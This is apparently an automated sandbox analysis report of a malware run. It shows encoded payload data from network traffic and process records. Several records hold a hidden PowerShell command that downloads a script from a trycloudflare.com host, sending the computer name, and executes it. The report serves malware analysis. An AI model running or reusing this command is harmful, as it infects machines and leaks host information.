                              2025-01-31 00:14:05 UTC1369INData Raw: 41 47 4d 41 65 51 41 31 41 48 63 41 59 51 42 58 41 46 45 41 5a 77 42 4c 41 48 6b 41 51 51 42 75 41 45 6b 41 52 77 42 6b 41 47 77 41 5a 41 42 44 41 45 49 41 61 67 42 69 41 44 49 41 4d 51 42 30 41 46 6b 41 56 77 41 31 41 47 73 41 59 67 42 48 41 47 77 41 64 51 42 61 41 46 4d 41 59 77 41 33 41 45 6b 41 52 77 42 57 41 44 51 41 57 67 42 58 41 45 30 41 62 77 42 5a 41 44 49 41 4f 51 42 30 41 47 49 41 56 77 42 47 41 48 55 41 57 67 42 47 41 45 49 41 61 77 42 4d 41 45 4d 41 51 67 41 33 41 47 51 41 4d 67 42 73 41 48 55 41 57 67 42 48 41 44 6b 41 4d 77 42 6a 41 44 41 41 61 41 42 77 41 46 6f 41 52 77 42 56 41 44 59 41 53 51 42 49 41 46 49 41 65 51 42 6b 41 46 63 41 56 67 41 35 41 45 77 41 51 77 42 42 41 47 38 41 57 67 42 59 41 45 6f 41 65 51 42 69 41 44 4d 41 53 51 42
                              Data Ascii: AGMAeQA1AHcAYQBXAFEAZwBLAHkAQQBuAEkARwBkAGwAZABDAEIAagBiADIAMQB0AFkAVwA1AGsAYgBHAGwAdQBaAFMAYwA3AEkARwBWADQAWgBXAE0AbwBZADIAOQB0AGIAVwBGAHUAWgBGAEIAawBMAEMAQgA3AGQAMgBsAHUAWgBHADkAMwBjADAAaABwAFoARwBVADYASQBIAFIAeQBkAFcAVgA5AEwAQwBBAG8AWgBYAEoAeQBiADMASQB
                              2025-01-31 00:14:05 UTC1369INData Raw: 46 4d 41 4e 51 41 77 41 47 4d 41 62 51 42 73 41 48 51 41 53 77 42 44 41 47 73 41 64 51 42 6a 41 47 30 41 56 67 42 33 41 47 49 41 52 77 42 47 41 47 6f 41 57 67 42 56 41 45 59 41 63 77 42 69 41 45 4d 41 61 41 42 79 41 45 77 41 51 77 42 42 41 47 34 41 53 67 42 35 41 47 73 41 4e 77 42 4a 41 45 63 41 54 67 42 32 41 47 49 41 62 67 42 4f 41 44 41 41 53 51 42 49 41 45 49 41 61 41 42 6b 41 45 63 41 5a 77 42 35 41 46 6f 41 62 51 42 73 41 48 4d 41 57 67 42 54 41 45 45 41 4f 51 42 4a 41 45 67 41 51 67 42 35 41 47 49 41 4d 67 42 4f 41 47 77 41 59 77 41 7a 41 45 30 41 64 51 42 5a 41 46 67 41 53 67 42 75 41 47 51 41 62 41 42 7a 41 48 63 41 57 41 42 54 41 44 55 41 65 51 42 61 41 46 67 41 51 67 42 7a 41 46 6b 41 56 77 42 4f 41 47 77 41 53 77 42 44 41 47 51 41 64 51 42 69
                              Data Ascii: FMANQAwAGMAbQBsAHQASwBDAGsAdQBjAG0AVgB3AGIARwBGAGoAWgBVAEYAcwBiAEMAaAByAEwAQwBBAG4ASgB5AGsANwBJAEcATgB2AGIAbgBOADAASQBIAEIAaABkAEcAZwB5AFoAbQBsAHMAWgBTAEEAOQBJAEgAQgB5AGIAMgBOAGwAYwAzAE0AdQBZAFgASgBuAGQAbABzAHcAWABTADUAeQBaAFgAQgBzAFkAVwBOAGwASwBDAGQAdQBi
                              2025-01-31 00:14:05 UTC1369INData Raw: 45 41 64 67 42 6b 41 45 4d 41 51 67 42 54 41 46 49 41 56 51 42 6b 41 47 59 41 56 51 41 78 41 47 38 41 5a 77 42 4d 41 44 49 41 55 51 42 6e 41 45 6f 41 65 51 42 42 41 48 49 41 53 51 42 48 41 48 4d 41 5a 77 42 4c 41 48 6b 41 51 67 42 36 41 46 6b 41 4d 77 42 4b 41 48 41 41 59 77 42 49 41 46 49 41 55 51 42 5a 41 46 67 41 55 67 42 76 41 45 77 41 62 67 42 4b 41 47 77 41 59 77 42 48 41 48 67 41 61 41 42 5a 41 44 49 41 56 67 42 43 41 47 49 41 52 77 42 33 41 47 38 41 59 51 42 35 41 48 63 41 5a 77 42 4b 41 44 45 41 65 41 42 6a 41 45 6f 41 65 51 42 42 41 48 49 41 53 51 42 48 41 48 4d 41 63 41 42 4a 41 45 4d 41 63 77 42 6e 41 47 45 41 65 51 42 42 41 48 49 41 53 51 42 44 41 47 4d 41 5a 77 42 4d 41 44 49 41 57 51 42 75 41 45 38 41 65 51 42 43 41 47 77 41 5a 51 42 48 41
                              Data Ascii: EAdgBkAEMAQgBTAFIAVQBkAGYAVQAxAG8AZwBMADIAUQBnAEoAeQBBAHIASQBHAHMAZwBLAHkAQgB6AFkAMwBKAHAAYwBIAFIAUQBZAFgAUgBvAEwAbgBKAGwAYwBHAHgAaABZADIAVgBCAGIARwB3AG8AYQB5AHcAZwBKADEAeABjAEoAeQBBAHIASQBHAHMAcABJAEMAcwBnAGEAeQBBAHIASQBDAGMAZwBMADIAWQBuAE8AeQBCAGwAZQBHA


                              Click to jump to process

                              Click to jump to process

                              • File
                              • Registry

                              Click to dive into process behavior distribution

                              Target ID:0
                              Start time:19:14:01
                              Start date:30/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s"
                              Imagebase:0xa40000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:1
                              Start time:19:14:01
                              Start date:30/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:19:14:01
                              Start date:30/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s
                              Imagebase:0xa40000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:19:14:01
                              Start date:30/01/2025
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s
                              Imagebase:0xc30000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                              Target ID:4
                              Start time:19:14:02
                              Start date:30/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              No disassembly